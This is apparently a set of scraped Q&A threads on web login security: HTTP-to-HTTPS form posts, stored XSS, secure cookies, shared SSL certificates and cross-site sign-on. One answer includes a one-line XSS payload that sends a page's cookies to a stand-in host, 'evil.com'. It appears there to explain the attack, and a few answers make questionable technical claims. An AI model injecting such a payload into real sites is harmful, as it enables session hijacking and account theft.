We are launching a new website(say A) and it has Username/Password to it and ours is a HTTP Site. We are POSTING Username/Password information to another site which is our another internal website(Say B) but that website is HTTPS site. Our 'A' site don’t handle Authorization and Authentication and neither we have Data bases nor their going to be any back communications(for error handling stuff like that) to the 'B' From 'A'. we tranfer them to the B website altogether and no coming back.
My Question is
Is the information I am Posting from HTTP to HTTPS site is secure? If yes How its secure. If No why.
The data will be encrypted from the browser to website B, but the end-user has no assurance that website B is who it claims to be. A "man in the middle" attack could be used which would deliver the secure information to the phony site.
Therefore, your login page should be hosted on website B and delivered using SSL (https).
Provided the user can verify the absence of scripts running on site A, it's possible to ensure that it's secure. What makes it a generally bad practice is that it's vulnerable to an active man in the middle who changes the form target or inserts a malicious script in the context of site A to steal the password and send it away before it gets submitted to the (secure) site B.
Related
I know xss attack usees input points of a page to insert javascript code into the page or into server db.
In both cases the javascript code will be activated soon or later on some events.
I imagine an attacker that uses a browser to put javascript code into a server db using maybe an input name.
Another client(victim) makes a request to the same server , maybe it asks for the user classific.
The attacker is in classific , so the attacker name(actually evil javascript code) is inserted in the page the victim requested.
The question is what information can the attacker steal and how?
I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected.
In this way he can pass to the jsp/asp or whatever information about cookies.
So if the site is in https , it's possible to include scripts which are in http server?
I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.
Or maybe there are other ways for the attacker to get information?
I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.
The question is what information can the attacker steal and how?
Yes, the easiest type of attack would be to steal non HttpOnly cookies.
<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>
Other attacks include injecting JavaScript keyloggers that send key strokes back to the attacker in a similar fashion, or redirecting the user to phishing sites or to sites containing drive by downloads.
So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.
Interesting question. Yes, the site being HTTPS does not reduce the chances of an XSS flaw. They would need to host their attacking page on a HTTPS enabled web server with a certificate trusted by their victim's machine. This could either be the attackers own machine with a cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt and similar.
Little security is required to get a Domain Validated certificate:
Low assurance certificates include only your domain name in the
certificate. Certificate Authorities usually verify that you own the
domain name by checking the WHOIS record. The certificate can be
issued instantly and is cheaper but, as the name implies, these
certificates provide less assurance to your customers.
You can use a Web Application Firewall to scan and block XSS, including in cookies (though the latter can cause false positives) https://medium.com/p/5d4b1d33219a/edit
For AWS WAF refer to https://aws.amazon.com/waf/
I have a website where users can post ads and view them. I am using ASP.net build it. So normally site is free for to view ads. But if anybody wants to post an ad he or she needs to be a registered user. So if an user try to Post an ad without logging then he will be redirect to login page. So I want to enable SSL for login page to securely transfer information over the internet.
Here few things you should know.
I just only need to secure the user name and passwords.
Ads post by users are not sensitive data. So it is OK if it transfer through non secure path.
I dont want to enable SSL for every page. Because it will slow down page loading and it is a CPU intense task.
So how to achieve this? Do I need to maintain the HTTPS state after user logged under SSL connection until he post articles and until he log out?
Cant I just secure the login page for authenticate the user and then go with normal pages? Keep in mind that I need to keep the logged information because I saw in an another blog that saying When you go from HTTPS to HTTP all the states are being lost. Is that true?
So Help me here.
Thank you very much.
You should maintain SSL for every page once a user is logged in so that you can use secure cookies for the authentication cookie. This can be set using the requireSSL="true" in the web.config (MSDN doc). You definitely should use secure cookies for authentication, and you'll only be able to utilize that cookie over HTTPS.
Or as Scott Hanselman put it in this seriously old blog post:
In order to prevent Session Hijacking, when you've got a secure site,
it's a good idea to mark your cookies as "secure," meaning that they
can't be accessed over HTTP. This prevents folks from being issued
cookies over HTTPS then switching to HTTP in order to access the
cookie with sniffers or other evil.
This question has also been covered at Information Security Stack Exchange and Programmers Stack Exchange.
More Reading: OWASP Top 10 for .NET developers part 9: Insufficient Transport Layer Protection
I was recently looking around at some of the features my current web host offers, and am now wondering about a few things. Even if you can only answer part of this, I appreciate any help you can provide.
I have a domain, mydomian.com, and the host offers shared SSL so I can use HTTPS by using this address https://mydomain.myhost.com. The SSL certificate is good for *.myhost.com.
I don't know a lot about SSL, but I'm assuming this means that the data between site users and ANY domain on myhost.com is encrypted. So was curious if this meant that if someone else on the same host as me somehow intercepted the data from my site would they be able to view it, since they would also have a https://theirdomain.myhost.com address, which uses the same SSL certificate? I may have no idea at all, and this was pretty much a guess.
If HTTPS is used on a login page, but after logging in the other pages are viewed over HTTP, is this a security issue?
Is there any way to show a web form via HTTP for bots like Google, but have real users redirected to the HTTPS version? Would be ideal if this could be done via .htaccess. I currently have some rewrite rules that redirect certain pages to HTTPS, but the rest as HTTP. So if a visitor visits the contact form they get the HTTPS version automatically, but it automatically switches back to HTTP for pages that don't contain forms. So, via htaccess, is there a way to direct real users to the HTTPS version, but have bots directed to the HTTP version? I would like these pages to still be indexed by the search engines, but would like users to see it via HTTPS.
Thanks in advance for any help you can provide.
I'm going to guess you'll be okay for number one. If your host does it correctly, individual subdomains never get to see the SSL keys. Here's how it would work:
Some guy with a browser sends an encrypted request to your subdomain server.
Your host's master server receives the request and decrypts it.
The master server sends the decrypted request to your subdomain server.
And any HTTPS responses you send back go through that process in reverse. It should be easy to check if they've set things up that way: If you can set up shared SSL without personally handling any key files, you're good. If you actually get your hands on some key files... not good.
For two: If you encrypt the login, you protect the passwords, which is good. But if you switch back to HTTP afterwards, you open yourself up to other attacks. See: Firesheep. There may be others.
And for three. Yes - definitely doable. Check out mod_rewrite. Can't give you an example, as I've never used this particular case, but I can point you to this page - particularly the section entitled "Browser Dependent Content."
Hope that helps!
Every traffic is encrypted, when you use https:// as protocol. (Except for some uncommon circumstances I won't talk about here). An SSL certificate's purpose is to prove the identity of the server, by combining it's public key with an identity. This certificate is only usable with the private key that belongs to the public one. In your case it seems that this certificate as well as the key-pair is provided by your hosting provider. I guess that neither you nor the other customers on the host have access to this private key. That means that only your provider is able to decrypt the traffic. Since that's always the case (he's running the server, so has access to every data), that should be no problem.
In most cases it is a security issue. On every further unencrypted http-request the client has to provide some information of the session to the server. These can be intercepted and used by an attacker. (simply speaking)
The bots should support https, why not redirect them? Anyhow: The important part is not to provide the page containing the form via https. To protect your user's data you should take care that the response is transferred via https.
I would like to create web application with admin/checkout sections being secured. Assuming I have SSL set up for subdomain.mydomain.com I would like to make sure that all that top-secret stuff ;) like checkout pages and admin section is transferred securely. Would it be ok to structure my application as below?
subdomain.mydomain.com
adminSectionFolder
adminPage1.php
adminPage2.php
checkoutPagesFolder
checkoutPage1.php
checkoutPage2.php
checkoutPage3.php
homepage.php
loginPage.php
someOtherPage.php
someNonSecureFolder
nonSecurePage1.php
nonSecurePage2.php
nonSecurePage3.php
imagesFolder
image1.jpg
image2.jpg
image3.jpg
Users would access my web application via http as there is no need for SSL for homepage and similar. Checkout/admin pages would have to be accessed via https though (that I would ensure via .htaccess redirects). I would also like to have login form on every page of the site, including non-secure pages. Now my questions are:
if I have form on non-secure page e.g http://subdomain.mydomain.com/homepage.php and that form sends data to https://subdomain.mydomain.com/loginPage.php, is data being send encrypted as if it were sent from https://subdomain.mydomain.com/homepage.php? I do realize users will not see padlock, but browser still should encrypt it, is it right?
EDIT: my apologies.. above in bold I originally typed http but meant https, my bad
2.If on secure page loginPage.php (or any other accessed via https for that instance) I created session, session ID would be assigned, and in case of my web app. something like username of the logged in user. Would I be able to access these session variable from http://subdomain.mydomain.com/homepage.php to for example display greeting message? If session ID is stored in cookies then it would be trouble I assume, but could someone clarify how it should be done? It seems important to have username and password send over SSL.
3.Related to above question I think.. would it actually make any sense to have login secured via SSL so usenrame/password would be transferred securely, and then session ID being transferred with no SSL? I mean wouldnt it be the same really if someone caught username and password being transferred, or caught session ID? Please let me know if I make sense here cause it feels like I'm missing something important.
EDIT: I came up with idea but again please let me know if that would work. Having above, so assuming that sharing session between http and https is as secure as login in user via plain http (not https), I guess on all non secure pages, like homepage etc. I could check if user is already logged in, and if so from php redirect to https version of same page. So user fills in login form from homepage.php, over ssl details are send to backend so probably https://.../homepage.php. Trying to access http://.../someOtherPage.php script would always check if session is created and if so redirect user to https version of this page so https://.../someOtherPage.php. Would that work?
4.To avoid browser popping message "this page contains non secure items..." my links to css, images and all assets, e.g. in case of http://subdomain.mydomain.com/checkoutPage1.php should be absolute so "/images/image1.jpg" or relative so "../images/image1.jpg"? I guess one of those would have to work :)
wow that's long post, thanks for your patience if you got that far and any answers :) oh yeh and I use php/apache on shared hosting
If the SSL termination is on the webserver itself, then you'll probably need to configure seperate document roots for the secure and non-secure parts - while you could specify that these both reference the same physical directory, you're going to get tied in knots switching between the parts. Similarly if your SSL termination is before the webserver you've got no systematic separation of the secure and non-secure parts.
Its a lot tidier to separate out the secure and non-secure parts into seperate trees - note that if you have non-SSL content on a secure page, the users will get warning messages.
Regards your specific questions
NO - whether data is encrypted depends on where it is GOING TO, not where it is coming from
YES - but only if you DO NOT set the secure_only cookie flag - note that if you follow my recommendations above, you also need to ensure that the cookie path is set to '/'
the page which processes the username and password MUST be secure. If not then you are exposing your clients authentication details (most people use the same password for all the sites they visit) and anyone running a network sniffer or proxy would have access.
Your EDIT left me a bit confused. SSL is computationally expensive and slow - so you want to minimise its use - but you need to balance this with your users perception of security - don't keep switching from SSL to non-SSL, and although its perfectly secure for users to enter their details on a page served up by non-SSL which sends to a SSL page, the users may not understand this distinction.
See the first part of my answer above.
C.
If I am on a website#1, and I enter my username/pwd for website#2 on a login page that is on website#1, and website#1, behind the scenes, makes a httpwebrequest to website#2 and posts to the login page. If I then navigate to website#2, should I be logged in?
website#2 uses formsauthentication and I call a httpHandler that is on website#2 and pass it the username/password via the querystring.
Should this work?
What you're trying to do is called Single Signon. The way you're doing it, posting values from one site to another, probably won't work because you're using the same technique a hacker might use to trick user into sharing their login information. It's called a cross-site request forgery attack. IIS is configured not to allow that.
Generally, you need a central authentication system that both sites use to share login information. This can be done in several ways, including a shared database-based login system. Google "asp.net single sign on" for more ideas.
Do site #1 and #2 want their users to have single sign on?
If so, read up on single sign on. It's a bigger project than can be addressed here. There is a good book on it though from Wrox :
http://www.amazon.com/Professional-ASP-NET-Security-Membership-Management/dp/0764596985/ref=cm_lmf_tit_10
Or are we imagining something sinister?
If we are imagining something sinister, then evil site #1 would collect the credentials, then automate a browser on the server side to start checking to see if site #2 uses the same password and user combination. Then the server would have an authenticated session. This wouldn't give the user who accessed site #1 an auth cookie, the HttpWebRequest object on the server would get the auth cookie. Site #2 couldn't really do anything to prevent this because a browser request from one computer looks much alike a browser request from another. A well crafted attack would spoof all elements of the browser's request so that it looks like it came from a browser instead of a primitative HttpWebRequest object, which may not even set the user-agent.
Site #2 should stop using passwords and user Id or use 2 factor ID if they are concerned abut this, or do something that requires javascript for logon because spoofing a browser that is executing javascript is harder than spoofing a browser that just sends and receives http requests and responses.
There are too many security issues trying to auto-authenticate between sites. There needs to be a central security provider that both sites belong to so that hand off is completed securely.
We use CA's Siteminder for cross site authentication. Effectively, web 1 creates a unique session id on the siteminder server and passes any credentials and info to it. Siteminder invokes web2 and passes the information by means of session variables. Web 2 retrieves the data from the session and uses it. There's much more going on there but that's the just of it.
To do something like this, I would strongly consider using an out of the box solution as generally coding up custom security generally falls short.
While this can be done on some cases, in the form of an HTTP request with POST parameters, you will not be authenticated once you browse to site #2.
This is because, generally, these sites store a cookie on your end and these are domain-based, which means that even if you grabbed that and stored it yourself from site #1, the cookie name would not match site #2.
Additionally, site #2 may not be easy to authenticate against and this is usually a security concern that developers are aware of. This can be considered an attempt of XSS as well.
In case you're simply doing this for yourself, I'd recommend LastPass and save most of your info in it.
Please reconsider your goals and how to achieve them, this is not the way.
Edit: Link text.
This could work, depending on the security measures in place on website #2. For a secure website, this would fail.
I would recommend against this purely on the basis of good security and good coding/design practices.
If you are unclear what security measures stop this, you should probably educate yourself so you can prevent the same issues on your own site. See http://www.owasp.org/index.php/Top_10_2007
Since both your sites are using FormsAuthentication you can easily configure both of them to share FormsAuthentication encryption schemes.
This will allow you to do Cross Application Authentication automatically :)